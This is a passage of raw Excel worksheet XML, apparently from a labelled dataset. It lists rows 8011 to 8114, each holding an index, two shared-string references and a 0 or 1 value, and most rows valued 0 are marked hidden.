        <v>2935</v>
      </c>
      <c r="C8011" s="1" t="s">
        <v>2936</v>
      </c>
      <c r="D8011" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8012" hidden="1">
      <c r="A8012" s="1">
        <v>8010.0</v>
      </c>
      <c r="B8012" s="1" t="s">
        <v>9631</v>
      </c>
      <c r="C8012" s="1" t="s">
        <v>9632</v>
      </c>
      <c r="D8012" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8013">
      <c r="A8013" s="1">
        <v>8011.0</v>
      </c>
      <c r="B8013" s="1" t="s">
        <v>9633</v>
      </c>
      <c r="C8013" s="1" t="s">
        <v>9634</v>
      </c>
      <c r="D8013" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8014" hidden="1">
      <c r="A8014" s="1">
        <v>8012.0</v>
      </c>
      <c r="B8014" s="1" t="s">
        <v>9635</v>
      </c>
      <c r="C8014" s="1" t="s">
        <v>9636</v>
      </c>
      <c r="D8014" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8015">
      <c r="A8015" s="1">
        <v>8013.0</v>
      </c>
      <c r="B8015" s="1" t="s">
        <v>9035</v>
      </c>
      <c r="C8015" s="1" t="s">
        <v>9036</v>
      </c>
      <c r="D8015" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8016">
      <c r="A8016" s="1">
        <v>8014.0</v>
      </c>
      <c r="B8016" s="1" t="s">
        <v>9637</v>
      </c>
      <c r="C8016" s="1" t="s">
        <v>9638</v>
      </c>
      <c r="D8016" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8017">
      <c r="A8017" s="1">
        <v>8015.0</v>
      </c>
      <c r="B8017" s="1" t="s">
        <v>8580</v>
      </c>
      <c r="C8017" s="1" t="s">
        <v>8581</v>
      </c>
      <c r="D8017" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8018" hidden="1">
      <c r="A8018" s="1">
        <v>8016.0</v>
      </c>
      <c r="B8018" s="1" t="s">
        <v>6667</v>
      </c>
      <c r="C8018" s="1" t="s">
        <v>9639</v>
      </c>
      <c r="D8018" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8019" hidden="1">
      <c r="A8019" s="1">
        <v>8017.0</v>
      </c>
      <c r="B8019" s="1" t="s">
        <v>315</v>
      </c>
      <c r="C8019" s="1" t="s">
        <v>9640</v>
      </c>
      <c r="D8019" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8020">
      <c r="A8020" s="1">
        <v>8018.0</v>
      </c>
      <c r="B8020" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="C8020" s="1" t="s">
        <v>6139</v>
      </c>
      <c r="D8020" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8021" hidden="1">
      <c r="A8021" s="1">
        <v>8019.0</v>
      </c>
      <c r="B8021" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C8021" s="1" t="s">
        <v>7521</v>
      </c>
      <c r="D8021" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8022" hidden="1">
      <c r="A8022" s="1">
        <v>8020.0</v>
      </c>
      <c r="B8022" s="1" t="s">
        <v>9641</v>
      </c>
      <c r="C8022" s="1" t="s">
        <v>9642</v>
      </c>
      <c r="D8022" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8023" hidden="1">
      <c r="A8023" s="1">
        <v>8021.0</v>
      </c>
      <c r="B8023" s="1" t="s">
        <v>6116</v>
      </c>
      <c r="C8023" s="1" t="s">
        <v>9643</v>
      </c>
      <c r="D8023" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8024" hidden="1">
      <c r="A8024" s="1">
        <v>8022.0</v>
      </c>
      <c r="B8024" s="1" t="s">
        <v>464</v>
      </c>
      <c r="C8024" s="1" t="s">
        <v>7958</v>
      </c>
      <c r="D8024" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8025" hidden="1">
      <c r="A8025" s="1">
        <v>8023.0</v>
      </c>
      <c r="B8025" s="1" t="s">
        <v>2277</v>
      </c>
      <c r="C8025" s="1" t="s">
        <v>9644</v>
      </c>
      <c r="D8025" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8026" hidden="1">
      <c r="A8026" s="1">
        <v>8024.0</v>
      </c>
      <c r="B8026" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C8026" s="1" t="s">
        <v>5871</v>
      </c>
      <c r="D8026" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8027" hidden="1">
      <c r="A8027" s="1">
        <v>8025.0</v>
      </c>
      <c r="B8027" s="1" t="s">
        <v>5177</v>
      </c>
      <c r="C8027" s="1" t="s">
        <v>5178</v>
      </c>
      <c r="D8027" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8028" hidden="1">
      <c r="A8028" s="1">
        <v>8026.0</v>
      </c>
      <c r="B8028" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C8028" s="1" t="s">
        <v>3352</v>
      </c>
      <c r="D8028" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8029" hidden="1">
      <c r="A8029" s="1">
        <v>8027.0</v>
      </c>
      <c r="B8029" s="1" t="s">
        <v>9645</v>
      </c>
      <c r="C8029" s="1" t="s">
        <v>9646</v>
      </c>
      <c r="D8029" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8030" hidden="1">
      <c r="A8030" s="1">
        <v>8028.0</v>
      </c>
      <c r="B8030" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C8030" s="1" t="s">
        <v>5459</v>
      </c>
      <c r="D8030" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8031" hidden="1">
      <c r="A8031" s="1">
        <v>8029.0</v>
      </c>
      <c r="B8031" s="1" t="s">
        <v>5927</v>
      </c>
      <c r="C8031" s="1" t="s">
        <v>5928</v>
      </c>
      <c r="D8031" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8032">
      <c r="A8032" s="1">
        <v>8030.0</v>
      </c>
      <c r="B8032" s="1" t="s">
        <v>9647</v>
      </c>
      <c r="C8032" s="1" t="s">
        <v>9648</v>
      </c>
      <c r="D8032" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8033" hidden="1">
      <c r="A8033" s="1">
        <v>8031.0</v>
      </c>
      <c r="B8033" s="1" t="s">
        <v>4539</v>
      </c>
      <c r="C8033" s="1" t="s">
        <v>4540</v>
      </c>
      <c r="D8033" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8034" hidden="1">
      <c r="A8034" s="1">
        <v>8032.0</v>
      </c>
      <c r="B8034" s="1" t="s">
        <v>8165</v>
      </c>
      <c r="C8034" s="1" t="s">
        <v>8166</v>
      </c>
      <c r="D8034" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8035">
      <c r="A8035" s="1">
        <v>8033.0</v>
      </c>
      <c r="B8035" s="1" t="s">
        <v>80</v>
      </c>
      <c r="C8035" s="1" t="s">
        <v>81</v>
      </c>
      <c r="D8035" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8036" hidden="1">
      <c r="A8036" s="1">
        <v>8034.0</v>
      </c>
      <c r="B8036" s="1" t="s">
        <v>9649</v>
      </c>
      <c r="C8036" s="1" t="s">
        <v>9650</v>
      </c>
      <c r="D8036" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8037" hidden="1">
      <c r="A8037" s="1">
        <v>8035.0</v>
      </c>
      <c r="B8037" s="1" t="s">
        <v>1947</v>
      </c>
      <c r="C8037" s="1" t="s">
        <v>1948</v>
      </c>
      <c r="D8037" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8038">
      <c r="A8038" s="1">
        <v>8036.0</v>
      </c>
      <c r="B8038" s="1" t="s">
        <v>9651</v>
      </c>
      <c r="C8038" s="1" t="s">
        <v>9652</v>
      </c>
      <c r="D8038" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8039">
      <c r="A8039" s="1">
        <v>8037.0</v>
      </c>
      <c r="B8039" s="1" t="s">
        <v>5015</v>
      </c>
      <c r="C8039" s="1" t="s">
        <v>5016</v>
      </c>
      <c r="D8039" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8040" hidden="1">
      <c r="A8040" s="1">
        <v>8038.0</v>
      </c>
      <c r="B8040" s="1" t="s">
        <v>2882</v>
      </c>
      <c r="C8040" s="1" t="s">
        <v>2883</v>
      </c>
      <c r="D8040" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8041" hidden="1">
      <c r="A8041" s="1">
        <v>8039.0</v>
      </c>
      <c r="B8041" s="1" t="s">
        <v>1808</v>
      </c>
      <c r="C8041" s="1" t="s">
        <v>7638</v>
      </c>
      <c r="D8041" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8042" hidden="1">
      <c r="A8042" s="1">
        <v>8040.0</v>
      </c>
      <c r="B8042" s="1" t="s">
        <v>42</v>
      </c>
      <c r="C8042" s="1" t="s">
        <v>6822</v>
      </c>
      <c r="D8042" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8043" hidden="1">
      <c r="A8043" s="1">
        <v>8041.0</v>
      </c>
      <c r="B8043" s="1" t="s">
        <v>786</v>
      </c>
      <c r="C8043" s="1" t="s">
        <v>9653</v>
      </c>
      <c r="D8043" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8044">
      <c r="A8044" s="1">
        <v>8042.0</v>
      </c>
      <c r="B8044" s="1" t="s">
        <v>2097</v>
      </c>
      <c r="C8044" s="1" t="s">
        <v>9654</v>
      </c>
      <c r="D8044" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8045" hidden="1">
      <c r="A8045" s="1">
        <v>8043.0</v>
      </c>
      <c r="B8045" s="1" t="s">
        <v>4331</v>
      </c>
      <c r="C8045" s="1" t="s">
        <v>9655</v>
      </c>
      <c r="D8045" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8046" hidden="1">
      <c r="A8046" s="1">
        <v>8044.0</v>
      </c>
      <c r="B8046" s="1" t="s">
        <v>9656</v>
      </c>
      <c r="C8046" s="1" t="s">
        <v>9657</v>
      </c>
      <c r="D8046" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8047" hidden="1">
      <c r="A8047" s="1">
        <v>8045.0</v>
      </c>
      <c r="B8047" s="1" t="s">
        <v>885</v>
      </c>
      <c r="C8047" s="1" t="s">
        <v>2467</v>
      </c>
      <c r="D8047" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8048" hidden="1">
      <c r="A8048" s="1">
        <v>8046.0</v>
      </c>
      <c r="B8048" s="1" t="s">
        <v>9658</v>
      </c>
      <c r="C8048" s="1" t="s">
        <v>9659</v>
      </c>
      <c r="D8048" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8049" hidden="1">
      <c r="A8049" s="1">
        <v>8047.0</v>
      </c>
      <c r="B8049" s="1" t="s">
        <v>2513</v>
      </c>
      <c r="C8049" s="1" t="s">
        <v>2514</v>
      </c>
      <c r="D8049" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8050">
      <c r="A8050" s="1">
        <v>8048.0</v>
      </c>
      <c r="B8050" s="1" t="s">
        <v>4196</v>
      </c>
      <c r="C8050" s="1" t="s">
        <v>4197</v>
      </c>
      <c r="D8050" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8051" hidden="1">
      <c r="A8051" s="1">
        <v>8049.0</v>
      </c>
      <c r="B8051" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C8051" s="1" t="s">
        <v>2318</v>
      </c>
      <c r="D8051" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8052" hidden="1">
      <c r="A8052" s="1">
        <v>8050.0</v>
      </c>
      <c r="B8052" s="1" t="s">
        <v>9660</v>
      </c>
      <c r="C8052" s="1" t="s">
        <v>9661</v>
      </c>
      <c r="D8052" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8053" hidden="1">
      <c r="A8053" s="1">
        <v>8051.0</v>
      </c>
      <c r="B8053" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="C8053" s="1" t="s">
        <v>1321</v>
      </c>
      <c r="D8053" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8054">
      <c r="A8054" s="1">
        <v>8052.0</v>
      </c>
      <c r="B8054" s="1" t="s">
        <v>8303</v>
      </c>
      <c r="C8054" s="1" t="s">
        <v>8304</v>
      </c>
      <c r="D8054" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8055" hidden="1">
      <c r="A8055" s="1">
        <v>8053.0</v>
      </c>
      <c r="B8055" s="1" t="s">
        <v>9662</v>
      </c>
      <c r="C8055" s="1" t="s">
        <v>9663</v>
      </c>
      <c r="D8055" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8056" hidden="1">
      <c r="A8056" s="1">
        <v>8054.0</v>
      </c>
      <c r="B8056" s="1" t="s">
        <v>9664</v>
      </c>
      <c r="C8056" s="1" t="s">
        <v>9665</v>
      </c>
      <c r="D8056" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8057">
      <c r="A8057" s="1">
        <v>8055.0</v>
      </c>
      <c r="B8057" s="1" t="s">
        <v>9666</v>
      </c>
      <c r="C8057" s="1" t="s">
        <v>9667</v>
      </c>
      <c r="D8057" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8058" hidden="1">
      <c r="A8058" s="1">
        <v>8056.0</v>
      </c>
      <c r="B8058" s="1" t="s">
        <v>4367</v>
      </c>
      <c r="C8058" s="1" t="s">
        <v>4368</v>
      </c>
      <c r="D8058" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8059" hidden="1">
      <c r="A8059" s="1">
        <v>8057.0</v>
      </c>
      <c r="B8059" s="1" t="s">
        <v>3035</v>
      </c>
      <c r="C8059" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="D8059" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8060" hidden="1">
      <c r="A8060" s="1">
        <v>8058.0</v>
      </c>
      <c r="B8060" s="1" t="s">
        <v>6231</v>
      </c>
      <c r="C8060" s="1" t="s">
        <v>6232</v>
      </c>
      <c r="D8060" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8061" hidden="1">
      <c r="A8061" s="1">
        <v>8059.0</v>
      </c>
      <c r="B8061" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="C8061" s="1" t="s">
        <v>2339</v>
      </c>
      <c r="D8061" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8062" hidden="1">
      <c r="A8062" s="1">
        <v>8060.0</v>
      </c>
      <c r="B8062" s="1" t="s">
        <v>383</v>
      </c>
      <c r="C8062" s="1" t="s">
        <v>9668</v>
      </c>
      <c r="D8062" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8063" hidden="1">
      <c r="A8063" s="1">
        <v>8061.0</v>
      </c>
      <c r="B8063" s="1" t="s">
        <v>406</v>
      </c>
      <c r="C8063" s="1" t="s">
        <v>407</v>
      </c>
      <c r="D8063" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8064" hidden="1">
      <c r="A8064" s="1">
        <v>8062.0</v>
      </c>
      <c r="B8064" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C8064" s="1" t="s">
        <v>6751</v>
      </c>
      <c r="D8064" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8065" hidden="1">
      <c r="A8065" s="1">
        <v>8063.0</v>
      </c>
      <c r="B8065" s="1" t="s">
        <v>9669</v>
      </c>
      <c r="C8065" s="1" t="s">
        <v>9670</v>
      </c>
      <c r="D8065" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8066" hidden="1">
      <c r="A8066" s="1">
        <v>8064.0</v>
      </c>
      <c r="B8066" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="C8066" s="1" t="s">
        <v>3566</v>
      </c>
      <c r="D8066" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8067">
      <c r="A8067" s="1">
        <v>8065.0</v>
      </c>
      <c r="B8067" s="1" t="s">
        <v>6885</v>
      </c>
      <c r="C8067" s="1" t="s">
        <v>6886</v>
      </c>
      <c r="D8067" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8068" hidden="1">
      <c r="A8068" s="1">
        <v>8066.0</v>
      </c>
      <c r="B8068" s="1" t="s">
        <v>1829</v>
      </c>
      <c r="C8068" s="1" t="s">
        <v>1830</v>
      </c>
      <c r="D8068" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8069" hidden="1">
      <c r="A8069" s="1">
        <v>8067.0</v>
      </c>
      <c r="B8069" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="C8069" s="1" t="s">
        <v>9671</v>
      </c>
      <c r="D8069" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8070" hidden="1">
      <c r="A8070" s="1">
        <v>8068.0</v>
      </c>
      <c r="B8070" s="1" t="s">
        <v>9509</v>
      </c>
      <c r="C8070" s="1" t="s">
        <v>9510</v>
      </c>
      <c r="D8070" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8071">
      <c r="A8071" s="1">
        <v>8069.0</v>
      </c>
      <c r="B8071" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="C8071" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="D8071" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8072" hidden="1">
      <c r="A8072" s="1">
        <v>8070.0</v>
      </c>
      <c r="B8072" s="1" t="s">
        <v>2902</v>
      </c>
      <c r="C8072" s="1" t="s">
        <v>9672</v>
      </c>
      <c r="D8072" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8073" hidden="1">
      <c r="A8073" s="1">
        <v>8071.0</v>
      </c>
      <c r="B8073" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C8073" s="1" t="s">
        <v>5364</v>
      </c>
      <c r="D8073" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8074">
      <c r="A8074" s="1">
        <v>8072.0</v>
      </c>
      <c r="B8074" s="1" t="s">
        <v>9673</v>
      </c>
      <c r="C8074" s="1" t="s">
        <v>9674</v>
      </c>
      <c r="D8074" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8075">
      <c r="A8075" s="1">
        <v>8073.0</v>
      </c>
      <c r="B8075" s="1" t="s">
        <v>7724</v>
      </c>
      <c r="C8075" s="1" t="s">
        <v>9675</v>
      </c>
      <c r="D8075" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8076">
      <c r="A8076" s="1">
        <v>8074.0</v>
      </c>
      <c r="B8076" s="1" t="s">
        <v>2074</v>
      </c>
      <c r="C8076" s="1" t="s">
        <v>2075</v>
      </c>
      <c r="D8076" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8077" hidden="1">
      <c r="A8077" s="1">
        <v>8075.0</v>
      </c>
      <c r="B8077" s="1" t="s">
        <v>257</v>
      </c>
      <c r="C8077" s="1" t="s">
        <v>3536</v>
      </c>
      <c r="D8077" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8078" hidden="1">
      <c r="A8078" s="1">
        <v>8076.0</v>
      </c>
      <c r="B8078" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="C8078" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="D8078" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8079" hidden="1">
      <c r="A8079" s="1">
        <v>8077.0</v>
      </c>
      <c r="B8079" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="C8079" s="1" t="s">
        <v>9676</v>
      </c>
      <c r="D8079" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8080" hidden="1">
      <c r="A8080" s="1">
        <v>8078.0</v>
      </c>
      <c r="B8080" s="1" t="s">
        <v>2661</v>
      </c>
      <c r="C8080" s="1" t="s">
        <v>2662</v>
      </c>
      <c r="D8080" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8081">
      <c r="A8081" s="1">
        <v>8079.0</v>
      </c>
      <c r="B8081" s="1" t="s">
        <v>9458</v>
      </c>
      <c r="C8081" s="1" t="s">
        <v>9459</v>
      </c>
      <c r="D8081" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8082">
      <c r="A8082" s="1">
        <v>8080.0</v>
      </c>
      <c r="B8082" s="1" t="s">
        <v>7457</v>
      </c>
      <c r="C8082" s="1" t="s">
        <v>2821</v>
      </c>
      <c r="D8082" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8083" hidden="1">
      <c r="A8083" s="1">
        <v>8081.0</v>
      </c>
      <c r="B8083" s="1" t="s">
        <v>3984</v>
      </c>
      <c r="C8083" s="1" t="s">
        <v>3985</v>
      </c>
      <c r="D8083" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8084" hidden="1">
      <c r="A8084" s="1">
        <v>8082.0</v>
      </c>
      <c r="B8084" s="1" t="s">
        <v>9677</v>
      </c>
      <c r="C8084" s="1" t="s">
        <v>9678</v>
      </c>
      <c r="D8084" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8085" hidden="1">
      <c r="A8085" s="1">
        <v>8083.0</v>
      </c>
      <c r="B8085" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C8085" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="D8085" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8086" hidden="1">
      <c r="A8086" s="1">
        <v>8084.0</v>
      </c>
      <c r="B8086" s="1" t="s">
        <v>5843</v>
      </c>
      <c r="C8086" s="1" t="s">
        <v>5844</v>
      </c>
      <c r="D8086" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8087" hidden="1">
      <c r="A8087" s="1">
        <v>8085.0</v>
      </c>
      <c r="B8087" s="1" t="s">
        <v>3677</v>
      </c>
      <c r="C8087" s="1" t="s">
        <v>3678</v>
      </c>
      <c r="D8087" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8088" hidden="1">
      <c r="A8088" s="1">
        <v>8086.0</v>
      </c>
      <c r="B8088" s="1" t="s">
        <v>8659</v>
      </c>
      <c r="C8088" s="1" t="s">
        <v>8660</v>
      </c>
      <c r="D8088" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8089">
      <c r="A8089" s="1">
        <v>8087.0</v>
      </c>
      <c r="B8089" s="1" t="s">
        <v>9679</v>
      </c>
      <c r="C8089" s="1" t="s">
        <v>9680</v>
      </c>
      <c r="D8089" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8090" hidden="1">
      <c r="A8090" s="1">
        <v>8088.0</v>
      </c>
      <c r="B8090" s="1" t="s">
        <v>9681</v>
      </c>
      <c r="C8090" s="1" t="s">
        <v>9682</v>
      </c>
      <c r="D8090" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8091" hidden="1">
      <c r="A8091" s="1">
        <v>8089.0</v>
      </c>
      <c r="B8091" s="1" t="s">
        <v>4729</v>
      </c>
      <c r="C8091" s="1" t="s">
        <v>9683</v>
      </c>
      <c r="D8091" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8092" hidden="1">
      <c r="A8092" s="1">
        <v>8090.0</v>
      </c>
      <c r="B8092" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C8092" s="1" t="s">
        <v>9684</v>
      </c>
      <c r="D8092" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8093">
      <c r="A8093" s="1">
        <v>8091.0</v>
      </c>
      <c r="B8093" s="1" t="s">
        <v>9685</v>
      </c>
      <c r="C8093" s="1" t="s">
        <v>9686</v>
      </c>
      <c r="D8093" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8094" hidden="1">
      <c r="A8094" s="1">
        <v>8092.0</v>
      </c>
      <c r="B8094" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C8094" s="1" t="s">
        <v>9023</v>
      </c>
      <c r="D8094" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8095" hidden="1">
      <c r="A8095" s="1">
        <v>8093.0</v>
      </c>
      <c r="B8095" s="1" t="s">
        <v>6131</v>
      </c>
      <c r="C8095" s="1" t="s">
        <v>6132</v>
      </c>
      <c r="D8095" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8096" hidden="1">
      <c r="A8096" s="1">
        <v>8094.0</v>
      </c>
      <c r="B8096" s="1" t="s">
        <v>2265</v>
      </c>
      <c r="C8096" s="1" t="s">
        <v>9687</v>
      </c>
      <c r="D8096" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8097">
      <c r="A8097" s="1">
        <v>8095.0</v>
      </c>
      <c r="B8097" s="1" t="s">
        <v>9688</v>
      </c>
      <c r="C8097" s="1" t="s">
        <v>9689</v>
      </c>
      <c r="D8097" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8098" hidden="1">
      <c r="A8098" s="1">
        <v>8096.0</v>
      </c>
      <c r="B8098" s="1" t="s">
        <v>5053</v>
      </c>
      <c r="C8098" s="1" t="s">
        <v>9690</v>
      </c>
      <c r="D8098" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8099" hidden="1">
      <c r="A8099" s="1">
        <v>8097.0</v>
      </c>
      <c r="B8099" s="1" t="s">
        <v>490</v>
      </c>
      <c r="C8099" s="1" t="s">
        <v>5762</v>
      </c>
      <c r="D8099" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8100">
      <c r="A8100" s="1">
        <v>8098.0</v>
      </c>
      <c r="B8100" s="1" t="s">
        <v>9691</v>
      </c>
      <c r="C8100" s="1" t="s">
        <v>9692</v>
      </c>
      <c r="D8100" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8101" hidden="1">
      <c r="A8101" s="1">
        <v>8099.0</v>
      </c>
      <c r="B8101" s="1" t="s">
        <v>6101</v>
      </c>
      <c r="C8101" s="1" t="s">
        <v>9693</v>
      </c>
      <c r="D8101" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8102">
      <c r="A8102" s="1">
        <v>8100.0</v>
      </c>
      <c r="B8102" s="1" t="s">
        <v>8116</v>
      </c>
      <c r="C8102" s="1" t="s">
        <v>9694</v>
      </c>
      <c r="D8102" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8103">
      <c r="A8103" s="1">
        <v>8101.0</v>
      </c>
      <c r="B8103" s="1" t="s">
        <v>9695</v>
      </c>
      <c r="C8103" s="1" t="s">
        <v>9696</v>
      </c>
      <c r="D8103" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8104">
      <c r="A8104" s="1">
        <v>8102.0</v>
      </c>
      <c r="B8104" s="1" t="s">
        <v>2656</v>
      </c>
      <c r="C8104" s="1" t="s">
        <v>9697</v>
      </c>
      <c r="D8104" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8105" hidden="1">
      <c r="A8105" s="1">
        <v>8103.0</v>
      </c>
      <c r="B8105" s="1" t="s">
        <v>7444</v>
      </c>
      <c r="C8105" s="1" t="s">
        <v>7445</v>
      </c>
      <c r="D8105" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8106" hidden="1">
      <c r="A8106" s="1">
        <v>8104.0</v>
      </c>
      <c r="B8106" s="1" t="s">
        <v>9698</v>
      </c>
      <c r="C8106" s="1" t="s">
        <v>9699</v>
      </c>
      <c r="D8106" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8107" hidden="1">
      <c r="A8107" s="1">
        <v>8105.0</v>
      </c>
      <c r="B8107" s="1" t="s">
        <v>7376</v>
      </c>
      <c r="C8107" s="1" t="s">
        <v>8708</v>
      </c>
      <c r="D8107" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8108">
      <c r="A8108" s="1">
        <v>8106.0</v>
      </c>
      <c r="B8108" s="1" t="s">
        <v>5622</v>
      </c>
      <c r="C8108" s="1" t="s">
        <v>5623</v>
      </c>
      <c r="D8108" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8109" hidden="1">
      <c r="A8109" s="1">
        <v>8107.0</v>
      </c>
      <c r="B8109" s="1" t="s">
        <v>7921</v>
      </c>
      <c r="C8109" s="1" t="s">
        <v>7922</v>
      </c>
      <c r="D8109" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8110" hidden="1">
      <c r="A8110" s="1">
        <v>8108.0</v>
      </c>
      <c r="B8110" s="1" t="s">
        <v>332</v>
      </c>
      <c r="C8110" s="1" t="s">
        <v>333</v>
      </c>
      <c r="D8110" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8111">
      <c r="A8111" s="1">
        <v>8109.0</v>
      </c>
      <c r="B8111" s="1" t="s">
        <v>5326</v>
      </c>
      <c r="C8111" s="1" t="s">
        <v>5327</v>
      </c>
      <c r="D8111" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8112" hidden="1">
      <c r="A8112" s="1">
        <v>8110.0</v>
      </c>
      <c r="B8112" s="1" t="s">
        <v>7800</v>
      </c>
      <c r="C8112" s="1" t="s">
        <v>7801</v>
      </c>
      <c r="D8112" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8113" hidden="1">
      <c r="A8113" s="1">
        <v>8111.0</v>
      </c>
      <c r="B8113" s="1" t="s">
        <v>984</v>
      </c>
      <c r="C8113" s="1" t="s">
        <v>4752</v>
      </c>
      <c r="D8113" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8114" hidden="1">
      <c r="A8114" s="1">
        <v>8112.0</v>
      </c>
      <c r="B8114" s="1" t="s">
        <v>9266</v>
      </c>
      <c r="C8114" s="1" t="s">
        <v>9267</v>
      </c>
